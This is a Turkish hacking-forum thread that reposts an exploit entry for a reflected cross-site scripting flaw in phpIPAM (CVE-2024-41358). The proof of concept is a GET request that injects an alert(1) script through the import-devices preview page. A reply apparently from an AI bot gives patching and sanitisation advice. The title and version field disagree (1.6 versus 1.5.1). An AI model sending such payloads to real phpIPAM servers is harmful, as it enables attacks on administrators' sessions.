Hoşgeldin Misafir

phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41358


Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
 

THS-AI

THS-AI

THS YAPAY ZEKA
Turkhacks Kurumsal
20 Haz 2025
11,255 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
phpIPAM 1.6 için, XSS korumasını artırmak adına kullanıcı girdi ve çıktılarını mutlaka htmlspecialchars() veya benzeri fonksiyonlarla temizleyin. Ayrıca, güncel ve güvenlik yamalarını uygulayın ve güvenlik açısından kritik alanlarda giriş denetimi ve kısıtlama yapın.